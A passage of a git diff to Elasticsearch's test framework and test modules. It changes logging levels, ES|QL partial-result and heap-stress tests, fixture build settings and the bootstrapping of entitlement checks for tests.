logger.info("[es.test.async_double_counter.total] callback with value [{}]", value); + logger.trace("[es.test.async_double_counter.total] callback with value [{}]", value); return value; }); } @@ -69,7 +69,7 @@ public void testUponRequest() { longHistogram.record(2); // triggers gauges and async counters - logger.info("setting async counters"); + logger.trace("setting async counters"); doubleWithAttributes.set(new DoubleWithAttributes(1.0, Map.of())); longWithAttributes.set(new LongWithAttributes(1, Map.of())); } diff --git a/test/external-modules/delayed-aggs/src/main/java/org/elasticsearch/test/delayedshard/DelayedShardAggregationBuilder.java b/test/external-modules/delayed-aggs/src/main/java/org/elasticsearch/test/delayedshard/DelayedShardAggregationBuilder.java index 5aeef2abfed12..d7b9e82385ba5 100644 --- a/test/external-modules/delayed-aggs/src/main/java/org/elasticsearch/test/delayedshard/DelayedShardAggregationBuilder.java +++ b/test/external-modules/delayed-aggs/src/main/java/org/elasticsearch/test/delayedshard/DelayedShardAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.test.delayedshard; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.core.TimeValue; @@ -136,6 +135,6 @@ public int hashCode() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/test/external-modules/error-query/src/javaRestTest/java/org/elasticsearch/test/esql/EsqlPartialResultsIT.java b/test/external-modules/error-query/src/javaRestTest/java/org/elasticsearch/test/esql/EsqlPartialResultsIT.java index 1a4299b0ce938..5f85dc8f3bec1 100644 --- a/test/external-modules/error-query/src/javaRestTest/java/org/elasticsearch/test/esql/EsqlPartialResultsIT.java +++ b/test/external-modules/error-query/src/javaRestTest/java/org/elasticsearch/test/esql/EsqlPartialResultsIT.java @@ -28,8 +28,8 @@ import static org.hamcrest.Matchers.containsString; import static org.hamcrest.Matchers.equalTo; +import static org.hamcrest.Matchers.greaterThan; import static org.hamcrest.Matchers.hasSize; -import static org.hamcrest.Matchers.lessThanOrEqualTo; public class EsqlPartialResultsIT extends ESRestTestCase { @ClassRule @@ -106,7 +106,11 @@ public void testPartialResult() throws Exception { Set okIds = populateIndices(); String query = """ { - "query": "FROM ok-index,failing-index | LIMIT 100 | KEEP fail_me,v" + "query": "FROM ok-index,failing-index | LIMIT 100 | KEEP fail_me,v", + "pragma": { + "max_concurrent_shards_per_node": 1 + }, + "accept_pragma_risks": true } """; // allow_partial_results = true @@ -123,7 +127,7 @@ public void testPartialResult() throws Exception { List columns = (List) results.get("columns"); assertThat(columns, equalTo(List.of(Map.of("name", "fail_me", "type", "long"), Map.of("name", "v", "type", "long")))); List values = (List) results.get("values"); - assertThat(values.size(), lessThanOrEqualTo(okIds.size())); + assertThat(values.size(), equalTo(okIds.size())); Map localInfo = (Map) XContentMapValues.extractValue( results, "_clusters", @@ -131,11 +135,10 @@ public void testPartialResult() throws Exception { "(local)" ); assertNotNull(localInfo); - assertThat(XContentMapValues.extractValue(localInfo, "_shards", "successful"), equalTo(0)); - assertThat( - XContentMapValues.extractValue(localInfo, "_shards", "failed"), - equalTo(XContentMapValues.extractValue(localInfo, "_shards", "total")) - ); + Integer successfulShards = (Integer) XContentMapValues.extractValue(localInfo, "_shards", "successful"); + Integer failedShards = (Integer) XContentMapValues.extractValue(localInfo, "_shards", "failed"); + assertThat(successfulShards, greaterThan(0)); + assertThat(failedShards, greaterThan(0)); List> failures = (List>) XContentMapValues.extractValue(localInfo, "failures"); assertThat(failures, hasSize(1)); assertThat( @@ -167,7 +170,11 @@ public void testFailureFromRemote() throws Exception { Set okIds = populateIndices(); String query = """ { - "query": "FROM *:ok-index,*:failing-index | LIMIT 100 | KEEP fail_me,v" + "query": "FROM *:ok-index,*:failing-index | LIMIT 100 | KEEP fail_me,v", + "pragma": { + "max_concurrent_shards_per_node": 1 + }, + "accept_pragma_risks": true } """; // allow_partial_results = true @@ -183,7 +190,7 @@ public void testFailureFromRemote() throws Exception { List columns = (List) results.get("columns"); assertThat(columns, equalTo(List.of(Map.of("name", "fail_me", "type", "long"), Map.of("name", "v", "type", "long")))); List values = (List) results.get("values"); - assertThat(values.size(), lessThanOrEqualTo(okIds.size())); + assertThat(values.size(), equalTo(okIds.size())); Map remoteCluster = (Map) XContentMapValues.extractValue( results, "_clusters", @@ -191,11 +198,10 @@ public void testFailureFromRemote() throws Exception { "cluster_one" ); assertNotNull(remoteCluster); - assertThat(XContentMapValues.extractValue(remoteCluster, "_shards", "successful"), equalTo(0)); - assertThat( - XContentMapValues.extractValue(remoteCluster, "_shards", "failed"), - equalTo(XContentMapValues.extractValue(remoteCluster, "_shards", "total")) - ); + Integer successfulShards = (Integer) XContentMapValues.extractValue(remoteCluster, "_shards", "successful"); + Integer failedShards = (Integer) XContentMapValues.extractValue(remoteCluster, "_shards", "failed"); + assertThat(successfulShards, greaterThan(0)); + assertThat(failedShards, greaterThan(0)); List> failures = (List>) XContentMapValues.extractValue(remoteCluster, "failures"); assertThat(failures, hasSize(1)); assertThat( @@ -207,6 +213,25 @@ public void testFailureFromRemote() throws Exception { } } + public void testAllShardsFailed() throws Exception { + setupRemoteClusters(); + populateIndices(); + try { + for (boolean allowPartialResults : List.of(Boolean.TRUE, Boolean.FALSE)) { + for (String index : List.of("failing*", "*:failing*", "*:failing*,failing*")) { + Request request = new Request("POST", "/_query"); + request.setJsonEntity("{\"query\": \"FROM " + index + " | LIMIT 100\"}"); + request.addParameter("allow_partial_results", Boolean.toString(allowPartialResults)); + var error = expectThrows(ResponseException.class, () -> client().performRequest(request)); + Response resp = error.getResponse(); + assertThat(EntityUtils.toString(resp.getEntity()), containsString("Accessing failing field")); + } + } + } finally { + removeRemoteCluster(); + } + } + private void setupRemoteClusters() throws IOException { String settings = String.format(Locale.ROOT, """ { diff --git a/test/external-modules/error-query/src/main/java/org/elasticsearch/test/errorquery/ErrorQueryBuilder.java b/test/external-modules/error-query/src/main/java/org/elasticsearch/test/errorquery/ErrorQueryBuilder.java index 3e4d52b5a66c7..ae6413c7efb5b 100644 --- a/test/external-modules/error-query/src/main/java/org/elasticsearch/test/errorquery/ErrorQueryBuilder.java +++ b/test/external-modules/error-query/src/main/java/org/elasticsearch/test/errorquery/ErrorQueryBuilder.java @@ -16,7 +16,6 @@ import org.apache.lucene.search.ScoreMode; import org.apache.lucene.search.Weight; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.common.logging.HeaderWarning; @@ -166,7 +165,7 @@ protected int doHashCode() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } static void sleep(long millis) { diff --git a/test/external-modules/esql-heap-attack/src/javaRestTest/java/org/elasticsearch/xpack/esql/heap_attack/Clusters.java b/test/external-modules/esql-heap-attack/src/javaRestTest/java/org/elasticsearch/xpack/esql/heap_attack/Clusters.java index 1c237404a78cc..bc5e1f123fe81 100644 --- a/test/external-modules/esql-heap-attack/src/javaRestTest/java/org/elasticsearch/xpack/esql/heap_attack/Clusters.java +++ b/test/external-modules/esql-heap-attack/src/javaRestTest/java/org/elasticsearch/xpack/esql/heap_attack/Clusters.java @@ -22,6 +22,7 @@ static ElasticsearchCluster buildCluster() { .setting("xpack.security.enabled", "false") .setting("xpack.license.self_generated.type", "trial") .setting("esql.query.allow_partial_results", "false") + .setting("logger.org.elasticsearch.compute.lucene.read", "DEBUG") .jvmArg("-Xmx512m"); String javaVersion = JvmInfo.jvmInfo().version(); if (javaVersion.equals("20") || javaVersion.equals("21")) { diff --git a/test/external-modules/esql-heap-attack/src/javaRestTest/java/org/elasticsearch/xpack/esql/heap_attack/HeapAttackIT.java b/test/external-modules/esql-heap-attack/src/javaRestTest/java/org/elasticsearch/xpack/esql/heap_attack/HeapAttackIT.java index 3912a63ef1514..8ae9db4c904c9 100644 --- a/test/external-modules/esql-heap-attack/src/javaRestTest/java/org/elasticsearch/xpack/esql/heap_attack/HeapAttackIT.java +++ b/test/external-modules/esql-heap-attack/src/javaRestTest/java/org/elasticsearch/xpack/esql/heap_attack/HeapAttackIT.java @@ -570,7 +570,7 @@ protected RestClient buildClient(Settings settings, HttpHost[] hosts) throws IOE } public void testFetchManyBigFields() throws IOException { - initManyBigFieldsIndex(100); + initManyBigFieldsIndex(100, "keyword"); Map response = fetchManyBigFields(100); ListMatcher columns = matchesList(); for (int f = 0; f < 1000; f++) { @@ -580,7 +580,7 @@ public void testFetchManyBigFields() throws IOException { } public void testFetchTooManyBigFields() throws IOException { - initManyBigFieldsIndex(500); + initManyBigFieldsIndex(500, "keyword"); // 500 docs is plenty to circuit break on most nodes assertCircuitBreaks(attempt -> fetchManyBigFields(attempt * 500)); } @@ -594,6 +594,58 @@ private Map fetchManyBigFields(int docs) throws IOException { return responseAsMap(query(query.toString(), "columns")); } + public void testAggManyBigTextFields() throws IOException { + int docs = 100; + int fields = 100; + initManyBigFieldsIndex(docs, "text"); + Map response = aggManyBigFields(fields); + ListMatcher columns = matchesList().item(matchesMap().entry("name", "sum").entry("type", "long")); + assertMap( + response, + matchesMap().entry("columns", columns).entry("values", matchesList().item(matchesList().item(1024 * fields * docs))) + ); + } + + /** + * Aggregates documents containing many fields which are {@code 1kb} each. + */ + private Map aggManyBigFields(int fields) throws IOException { + StringBuilder query = startQuery(); + query.append("FROM manybigfields | STATS sum = SUM("); + query.append("LENGTH(f").append(String.format(Locale.ROOT, "%03d", 0)).append(")"); + for (int f = 1; f < fields; f++) { + query.append(" + LENGTH(f").append(String.format(Locale.ROOT, "%03d", f)).append(")"); + } + query.append(")\"}"); + return responseAsMap(query(query.toString(), "columns,values")); + } + + /** + * Aggregates on the {@code LENGTH} of a giant text field. Without + * splitting pages on load (#131053) this throws a {@link CircuitBreakingException} + * when it tries to load a giant field. With that change it finishes + * after loading many single-row pages. + */ + public void testAggGiantTextField() throws IOException { + int docs = 100; + initGiantTextField(docs); + Map response = aggGiantTextField(); + ListMatcher columns = matchesList().item(matchesMap().entry("name", "sum").entry("type", "long")); + assertMap( + response, + matchesMap().entry("columns", columns).entry("values", matchesList().item(matchesList().item(1024 * 1024 * 5 * docs))) + ); + } + + /** + * Aggregates documents containing a text field that is {@code 1mb} each. + */ + private Map aggGiantTextField() throws IOException { + StringBuilder query = startQuery(); + query.append("FROM bigtext | STATS sum = SUM(LENGTH(f))\"}"); + return responseAsMap(query(query.toString(), "columns,values")); + } + public void testAggMvLongs() throws IOException { int fieldValues = 100; initMvLongsIndex(1, 3, fieldValues); @@ -788,7 +840,7 @@ private void initSingleDocIndex() throws IOException { """); } - private void initManyBigFieldsIndex(int docs) throws IOException { + private void initManyBigFieldsIndex(int docs, String type) throws IOException { logger.info("loading many documents with many big fields"); int docsPerBulk = 5; int fields = 1000; @@ -799,7 +851,7 @@ private void initManyBigFieldsIndex(int docs) throws IOException { config.startObject("settings").field("index.mapping.total_fields.limit", 10000).endObject(); config.startObject("mappings").startObject("properties"); for (int f = 0; f < fields; f++) { - config.startObject("f" + String.format(Locale.ROOT, "%03d", f)).field("type", "keyword").endObject(); + config.startObject("f" + String.format(Locale.ROOT, "%03d", f)).field("type", type).endObject(); } config.endObject().endObject(); request.setJsonEntity(Strings.toString(config.endObject())); @@ -831,6 +883,46 @@ private void initManyBigFieldsIndex(int docs) throws IOException { initIndex("manybigfields", bulk.toString()); } + private void initGiantTextField(int docs) throws IOException { + int docsPerBulk = 10; + for (Map nodeInfo : getNodesInfo(adminClient()).values()) { + for (Object module : (List) nodeInfo.get("modules")) { + Map moduleInfo = (Map) module; + final String moduleName = moduleInfo.get("name").toString(); + if (moduleName.startsWith("serverless-")) { + docsPerBulk = 3; + } + } + } + logger.info("loading many documents with one big text field - docs per bulk {}", docsPerBulk); + int fieldSize = Math.toIntExact(ByteSizeValue.ofMb(5).getBytes()); + + Request request = new Request("PUT", "/bigtext"); + XContentBuilder config = JsonXContent.contentBuilder().startObject(); + config.startObject("mappings").startObject("properties"); + config.startObject("f").field("type", "text").endObject(); + config.endObject().endObject(); + request.setJsonEntity(Strings.toString(config.endObject())); + Response response = client().performRequest(request); + assertThat( + EntityUtils.toString(response.getEntity(), StandardCharsets.UTF_8), + equalTo("{\"acknowledged\":true,\"shards_acknowledged\":true,\"index\":\"bigtext\"}") + ); + + StringBuilder bulk = new StringBuilder(); + for (int d = 0; d < docs; d++) { + bulk.append("{\"create\":{}}\n"); + bulk.append("{\"f\":\""); + bulk.append(Integer.toString(d % 10).repeat(fieldSize)); + bulk.append("\"}\n"); + if (d % docsPerBulk == docsPerBulk - 1 && d != docs - 1) { + bulk("bigtext", bulk.toString()); + bulk.setLength(0); + } + } + initIndex("bigtext", bulk.toString()); + } + private void initMvLongsIndex(int docs, int fields, int fieldValues) throws IOException { logger.info("loading documents with many multivalued longs"); int docsPerBulk = 100; @@ -969,6 +1061,15 @@ private void bulk(String name, String bulk) throws IOException { ); Response response = client().performRequest(request); assertThat(entityAsMap(response), matchesMap().entry("errors", false).extraOk()); + + /* + * Flush after each bulk to clear the test-time seenSequenceNumbers Map in + * TranslogWriter. Without this the server will OOM from time to time keeping + * stuff around to run assertions on. + */ + request = new Request("POST", "/" + name + "/_flush"); + response = client().performRequest(request); + assertThat(entityAsMap(response), matchesMap().entry("_shards", matchesMap().extraOk().entry("failed", 0)).extraOk()); } private void initIndex(String name, String bulk) throws IOException { diff --git a/test/external-modules/multi-project/src/test/java/org/elasticsearch/multiproject/action/DeleteProjectActionTests.java b/test/external-modules/multi-project/src/test/java/org/elasticsearch/multiproject/action/DeleteProjectActionTests.java index 1fb11acb550f7..5f71fccb73888 100644 --- a/test/external-modules/multi-project/src/test/java/org/elasticsearch/multiproject/action/DeleteProjectActionTests.java +++ b/test/external-modules/multi-project/src/test/java/org/elasticsearch/multiproject/action/DeleteProjectActionTests.java @@ -64,7 +64,7 @@ public void testDeleteNonExisting() throws Exception { ); var nonExistingTask = createTask(randomUniqueProjectId(), listener); var tasks = Stream.concat(Stream.of(nonExistingTask), deletedProjects.stream().map(this::createTask)).toList(); - var result = ClusterStateTaskExecutorUtils.executeIgnoringFailures(state, executor, tasks); + var result = ClusterStateTaskExecutorUtils.executeHandlingResults(state, executor, tasks, t -> {}, DeleteProjectTask::onFailure); for (ProjectId deletedProject : deletedProjects) { assertNull(result.metadata().projects().get(deletedProject)); assertNull(result.globalRoutingTable().routingTables().get(deletedProject)); diff --git a/test/fixtures/hdfs-fixture/build.gradle b/test/fixtures/hdfs-fixture/build.gradle index b716659648cf1..4c8e145f19551 100644 --- a/test/fixtures/hdfs-fixture/build.gradle +++ b/test/fixtures/hdfs-fixture/build.gradle @@ -148,6 +148,7 @@ tasks.named("shadowJar").configure { relocate("org.apache.hadoop", "fixture.hdfs3.org.apache.hadoop") { exclude "org.apache.hadoop.hdfs.protocol.ClientProtocol" exclude "org.apache.hadoop.ipc.StandbyException" + exclude "org.apache.hadoop.application-classloader.properties" } configurations.add(project.configurations.hdfs3) } @@ -156,6 +157,7 @@ def hdfs2Jar = tasks.register("hdfs2jar", ShadowJar) { relocate("org.apache.hadoop", "fixture.hdfs2.org.apache.hadoop") { exclude "org.apache.hadoop.hdfs.protocol.ClientProtocol" exclude "org.apache.hadoop.ipc.StandbyException" + exclude "org.apache.hadoop.application-classloader.properties" } archiveClassifier.set("hdfs2") from sourceSets.main.output @@ -173,6 +175,10 @@ tasks.withType(ShadowJar).configureEach { exclude(dependency('com.fasterxml.jackson.core:.*:.*')) } + filesMatching("META-INF/services/**") { + duplicatesStrategy = DuplicatesStrategy.INCLUDE // Or something else. + } + transform(org.elasticsearch.gradle.internal.shadow.XmlClassRelocationTransformer.class) { resource = "core-default.xml" enabled = true diff --git a/test/fixtures/minio-fixture/src/main/java/org/elasticsearch/test/fixtures/minio/MinioTestContainer.java b/test/fixtures/minio-fixture/src/main/java/org/elasticsearch/test/fixtures/minio/MinioTestContainer.java index 64518cde6dd16..29cb2607844cc 100644 --- a/test/fixtures/minio-fixture/src/main/java/org/elasticsearch/test/fixtures/minio/MinioTestContainer.java +++ b/test/fixtures/minio-fixture/src/main/java/org/elasticsearch/test/fixtures/minio/MinioTestContainer.java @@ -15,9 +15,10 @@ public final class MinioTestContainer extends DockerEnvironmentAwareTestContainer { - // NB releases earlier than 2025-05-24 are buggy, see https://github.com/minio/minio/issues/21189, and #127166 for a workaround - // However the 2025-05-24 release is also buggy, see https://github.com/minio/minio/issues/21377, and this has no workaround - public static final String DOCKER_BASE_IMAGE = "minio/minio:RELEASE.2025-06-13T11-33-47Z"; + // NB releases earlier than 2025-05-24 are buggy, see https://github.com/minio/minio/issues/21189, and #127166 for a workaround. + // However the 2025-05-24 release is also buggy, see https://github.com/minio/minio/issues/21377, and this has no workaround. + // Also https://github.com/minio/minio/issues/21456 seems to affect releases newer than 2025-05-24, see #131815 for workaround. + public static final String DOCKER_BASE_IMAGE = "minio/minio:RELEASE.2025-07-23T15-54-02Z"; private static final int servicePort = 9000; private final boolean enabled; diff --git a/test/framework/src/main/java/org/elasticsearch/bootstrap/BootstrapForTesting.java b/test/framework/src/main/java/org/elasticsearch/bootstrap/BootstrapForTesting.java index 318f2ce863173..bf53f14bc9e46 100644 --- a/test/framework/src/main/java/org/elasticsearch/bootstrap/BootstrapForTesting.java +++ b/test/framework/src/main/java/org/elasticsearch/bootstrap/BootstrapForTesting.java @@ -15,6 +15,7 @@ import org.elasticsearch.common.settings.Settings; import org.elasticsearch.core.Booleans; import org.elasticsearch.core.PathUtils; +import org.elasticsearch.entitlement.bootstrap.TestEntitlementBootstrap; import org.elasticsearch.jdk.JarHell; import java.io.IOException; @@ -71,6 +72,13 @@ public class BootstrapForTesting { // Log ifconfig output before SecurityManager is installed IfConfig.logIfNecessary(); + + // Fire up entitlements + try { + TestEntitlementBootstrap.bootstrap(javaTmpDir); + } catch (IOException e) { + throw new IllegalStateException(e.getClass().getSimpleName() + " while initializing entitlements for tests", e); + } } // does nothing, just easy way to make sure the class is loaded. diff --git a/test/framework/src/main/java/org/elasticsearch/bootstrap/TestScopeResolver.java b/test/framework/src/main/java/org/elasticsearch/bootstrap/TestScopeResolver.java index c29bd84d1fda9..3a42485822f3c 100644 --- a/test/framework/src/main/java/org/elasticsearch/bootstrap/TestScopeResolver.java +++ b/test/framework/src/main/java/org/elasticsearch/bootstrap/TestScopeResolver.java @@ -16,11 +16,15 @@ import java.net.MalformedURLException; import java.net.URL; -import java.util.HashMap; import java.util.List; import java.util.Map; +import java.util.Set; +import java.util.TreeMap; import java.util.function.Function; +import static org.elasticsearch.entitlement.runtime.policy.PolicyManager.ALL_UNNAMED; +import static org.elasticsearch.entitlement.runtime.policy.PolicyManager.ComponentKind.PLUGIN; + public record TestScopeResolver(Map scopeMap) { private static final Logger logger = LogManager.getLogger(TestScopeResolver.class); @@ -31,6 +35,13 @@ PolicyManager.PolicyScope getScope(Class callerClass) { var location = callerCodeSource.getLocation().toString(); var scope = scopeMap.get(location); + if (scope == null) { + // Special cases for libraries not handled by our automatically-generated scopeMap + if (callerClass.getPackageName().startsWith("org.bouncycastle")) { + scope = new PolicyManager.PolicyScope(PLUGIN, "security", ALL_UNNAMED); + logger.debug("Assuming bouncycastle is part of the security plugin"); + } + } if (scope == null) { logger.warn("Cannot identify a scope for class [{}], location [{}]", callerClass.getName(), location); return PolicyManager.PolicyScope.unknown(location); @@ -40,20 +51,22 @@ PolicyManager.PolicyScope getScope(Class callerClass) { public static Function, PolicyManager.PolicyScope> createScopeResolver( TestBuildInfo serverBuildInfo, - List pluginsBuildInfo + List pluginsBuildInfo, + Set modularPlugins ) { - - Map scopeMap = new HashMap<>(); + Map scopeMap = new TreeMap<>(); // Sorted to make it easier to read during debugging for (var pluginBuildInfo : pluginsBuildInfo) { + boolean isModular = modularPlugins.contains(pluginBuildInfo.component()); for (var location : pluginBuildInfo.locations()) { var codeSource = TestScopeResolver.class.getClassLoader().getResource(location.representativeClass()); if (codeSource == null) { throw new IllegalArgumentException("Cannot locate class [" + location.representativeClass() + "]"); } try { + String module = isModular ? location.module() : ALL_UNNAMED; scopeMap.put( getCodeSource(codeSource, location.representativeClass()), - PolicyManager.PolicyScope.plugin(pluginBuildInfo.component(), location.module()) + PolicyManager.PolicyScope.plugin(pluginBuildInfo.component(), module) ); } catch (MalformedURLException e) { throw new IllegalArgumentException("Cannot locate class [" + location.representativeClass() + "]", e); @@ -64,7 +77,8 @@ public static Function, PolicyManager.PolicyScope> createScopeResolver( for (var location : serverBuildInfo.locations()) { var classUrl = TestScopeResolver.class.getClassLoader().getResource(location.representativeClass()); if (classUrl == null) { - throw new IllegalArgumentException("Cannot locate class [" + location.representativeClass() + "]"); + logger.debug("Representative class is unavailable; proceeding without {}", location); + continue; } try { scopeMap.put(getCodeSource(classUrl, location.representativeClass()), PolicyManager.PolicyScope.server(location.module())); diff --git a/test/framework/src/main/java/org/elasticsearch/cluster/metadata/DataStreamTestHelper.java b/test/framework/src/main/java/org/elasticsearch/cluster/metadata/DataStreamTestHelper.java index 7c78c82f75f0e..60154d910334a 100644 --- a/test/framework/src/main/java/org/elasticsearch/cluster/metadata/DataStreamTestHelper.java +++ b/test/framework/src/main/java/org/elasticsearch/cluster/metadata/DataStreamTestHelper.java @@ -183,7 +183,11 @@ public static DataStream newInstance( .setReplicated(replicated) .setLifecycle(lifecycle) .setDataStreamOptions(dataStreamOptions) - .setFailureIndices(DataStream.DataStreamIndices.failureIndicesBuilder(failureStores).build()) + .setFailureIndices( + DataStream.DataStreamIndices.failureIndicesBuilder(failureStores) + .setRolloverOnWrite((replicated == false) && (failureStores.isEmpty())) + .build() + ) .build(); } @@ -390,7 +394,7 @@ public static DataStream randomInstance(String dataStreamName, LongSupplier time ) .build(), DataStream.DataStreamIndices.failureIndicesBuilder(failureIndices) - .setRolloverOnWrite(failureStore && replicated == false && randomBoolean()) + .setRolloverOnWrite(replicated == false && (failureIndices.isEmpty() || randomBoolean())) .setAutoShardingEvent( failureStore && randomBoolean() ? new DataStreamAutoShardingEvent( diff --git a/test/framework/src/main/java/org/elasticsearch/cluster/routing/TestShardRouting.java b/test/framework/src/main/java/org/elasticsearch/cluster/routing/TestShardRouting.java index 731faccdeede1..84e1dd532e2b7 100644 --- a/test/framework/src/main/java/org/elasticsearch/cluster/routing/TestShardRouting.java +++ b/test/framework/src/main/java/org/elasticsearch/cluster/routing/TestShardRouting.java @@ -131,6 +131,16 @@ public static ShardRouting newShardRouting(ShardId shardId, String currentNodeId return newShardRouting(shardId, currentNodeId, primary, state, ShardRouting.Role.DEFAULT); } + public static ShardRouting newShardRouting( + ShardId shardId, + String currentNodeId, + boolean primary, + ShardRoutingState state, + RecoverySource recoverySource + ) { + return newShardRouting(shardId, currentNodeId, primary, state, recoverySource, ShardRouting.Role.DEFAULT); + } + public static ShardRouting newShardRouting( ShardId shardId, String currentNodeId, @@ -154,6 +164,30 @@ public static ShardRouting newShardRouting( ); } + public static ShardRouting newShardRouting( + ShardId shardId, + String currentNodeId, + boolean primary, + ShardRoutingState state, + RecoverySource recoverySource, + ShardRouting.Role role + ) { + assertNotEquals(ShardRoutingState.RELOCATING, state); + return new ShardRouting( + shardId, + currentNodeId, + null, + primary, + state, + recoverySource, + buildUnassignedInfo(state), + buildRelocationFailureInfo(state), + buildAllocationId(state), + ShardRouting.UNAVAILABLE_EXPECTED_SHARD_SIZE, + role + ); + } + public static ShardRouting newShardRouting( String index, int shardId, diff --git a/test/framework/src/main/java/org/elasticsearch/entitlement/bootstrap/TestEntitlementBootstrap.java b/test/framework/src/main/java/org/elasticsearch/entitlement/bootstrap/TestEntitlementBootstrap.java index f4573f5061cc9..2e9ffc7558280 100644 --- a/test/framework/src/main/java/org/elasticsearch/entitlement/bootstrap/TestEntitlementBootstrap.java +++ b/test/framework/src/main/java/org/elasticsearch/entitlement/bootstrap/TestEntitlementBootstrap.java @@ -12,7 +12,9 @@ import org.elasticsearch.bootstrap.TestBuildInfo; import org.elasticsearch.bootstrap.TestBuildInfoParser; import org.elasticsearch.bootstrap.TestScopeResolver; -import org.elasticsearch.core.Strings; +import org.elasticsearch.common.Strings; +import org.elasticsearch.core.Booleans; +import org.elasticsearch.core.PathUtils; import org.elasticsearch.core.SuppressForbidden; import org.elasticsearch.entitlement.initialization.EntitlementInitialization; import org.elasticsearch.entitlement.runtime.policy.PathLookup; @@ -26,78 +28,112 @@ import java.io.IOException; import java.io.InputStream; +import java.net.URI; import java.net.URL; import java.nio.file.Path; import java.util.ArrayList; +import java.util.Arrays; import java.util.HashMap; import java.util.List; import java.util.Map; import java.util.Set; -import java.util.stream.Stream; +import java.util.TreeSet; -public class TestEntitlementBootstrap { +import static java.util.stream.Collectors.toCollection; +import static java.util.stream.Collectors.toSet; +public class TestEntitlementBootstrap { private static final Logger logger = LogManager.getLogger(TestEntitlementBootstrap.class); + private static TestPathLookup TEST_PATH_LOOKUP; + private static TestPolicyManager POLICY_MANAGER; + /** * Activates entitlement checking in tests. */ - public static void bootstrap() throws IOException { - TestPathLookup pathLookup = new TestPathLookup(); - EntitlementInitialization.initializeArgs = new EntitlementInitialization.InitializeArgs( - pathLookup, - Set.of(), - createPolicyManager(pathLookup) - ); - logger.debug("Loading entitlement agent"); - EntitlementBootstrap.loadAgent(EntitlementBootstrap.findAgentJar(), EntitlementInitialization.class.getName()); - } - - private record TestPathLookup() implements PathLookup { - @Override - public Path pidFile() { - return null; + public static void bootstrap(Path tempDir) throws IOException { + if (isEnabledForTests() == false) { + return; } + assert POLICY_MANAGER == null && TEST_PATH_LOOKUP == null : "Test entitlement bootstrap called multiple times"; + TEST_PATH_LOOKUP = new TestPathLookup(tempDir); + POLICY_MANAGER = createPolicyManager(TEST_PATH_LOOKUP); + loadAgent(POLICY_MANAGER, TEST_PATH_LOOKUP); + } - @Override - public Stream getBaseDirPaths(BaseDir baseDir) { - return Stream.empty(); - } + public static boolean isEnabledForTests() { + return Booleans.parseBoolean(System.getProperty("es.entitlement.enableForTests", "false")); + } - @Override - public Stream resolveSettingPaths(BaseDir baseDir, String settingName) { - return Stream.empty(); - } + static TestPolicyManager testPolicyManager() { + return POLICY_MANAGER; + } + static TestPathLookup testPathLookup() { + return TEST_PATH_LOOKUP; } - private static PolicyManager createPolicyManager(PathLookup pathLookup) throws IOException { + private static void loadAgent(PolicyManager policyManager, PathLookup pathLookup) { + logger.debug("Loading entitlement agent"); + EntitlementInitialization.initializeArgs = new EntitlementInitialization.InitializeArgs(pathLookup, Set.of(), policyManager); + EntitlementBootstrap.loadAgent(EntitlementBootstrap.findAgentJar(), EntitlementInitialization.class.getName()); + } + private static TestPolicyManager createPolicyManager(PathLookup pathLookup) throws IOException { var pluginsTestBuildInfo = TestBuildInfoParser.parseAllPluginTestBuildInfo(); var serverTestBuildInfo = TestBuildInfoParser.parseServerTestBuildInfo(); - var scopeResolver = TestScopeResolver.createScopeResolver(serverTestBuildInfo, pluginsTestBuildInfo); List pluginNames = pluginsTestBuildInfo.stream().map(TestBuildInfo::component).toList(); var pluginDescriptors = parsePluginsDescriptors(pluginNames); + Set modularPlugins = pluginDescriptors.stream() + .filter(PluginDescriptor::isModular) + .map(PluginDescriptor::getName) + .collect(toSet()); + var scopeResolver = TestScopeResolver.createScopeResolver(serverTestBuildInfo, pluginsTestBuildInfo, modularPlugins); var pluginsData = pluginDescriptors.stream() .map(descriptor -> new TestPluginData(descriptor.getName(), descriptor.isModular(), false)) .toList(); Map pluginPolicies = parsePluginsPolicies(pluginsData); + String separator = System.getProperty("path.separator"); + + // In production, plugins would have access to their respective bundle directories, + // and so they'd be able to read from their jars. In testing, we approximate this + // by considering the entire classpath to be "source paths" of all plugins. This + // also has the effect of granting read access to everything on the test-only classpath, + // which is fine, because any entitlement errors there could only be false positives. + String classPathProperty = System.getProperty("java.class.path"); + + Set classPathEntries; + if (classPathProperty == null) { + classPathEntries = Set.of(); + } else { + classPathEntries = Arrays.stream(classPathProperty.split(separator)).map(PathUtils::get).collect(toCollection(TreeSet::new)); + } FilesEntitlementsValidation.validate(pluginPolicies, pathLookup); + String testOnlyPathString = System.getenv("es.entitlement.testOnlyPath"); + Set testOnlyClassPath; + if (testOnlyPathString == null) { + testOnlyClassPath = Set.of(); + } else { + testOnlyClassPath = Arrays.stream(testOnlyPathString.split(separator)) + .map(PathUtils::get) + .map(Path::toUri) + .collect(toCollection(TreeSet::new)); + } + return new TestPolicyManager( HardcodedEntitlements.serverPolicy(null, null), HardcodedEntitlements.agentEntitlements(), pluginPolicies, scopeResolver, - Map.of(), - pathLookup + pathLookup, + classPathEntries, + testOnlyClassPath ); } - private record TestPluginData(String pluginName, boolean isModular, boolean isExternalPlugin) {} - private static Map parsePluginsPolicies(List pluginsData) { Map policies = new HashMap<>(); for (var pluginData : pluginsData) { @@ -137,4 +173,6 @@ private static InputStream getStream(URL resource) throws IOException { return resource.openStream(); } + private record TestPluginData(String pluginName, boolean isModular, boolean isExternalPlugin) {} + } diff --git a/test/framework/src/main/java/org/elasticsearch/entitlement/bootstrap/TestEntitlementsRule.java b/test/framework/src/main/java/org/elasticsearch/entitlement/bootstrap/TestEntitlementsRule.java new file mode 100644 index 0000000000000..1c057de296e9b --- /dev/null +++ b/test/framework/src/main/java/org/elasticsearch/entitlement/bootstrap/TestEntitlementsRule.java @@ -0,0 +1,193 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * 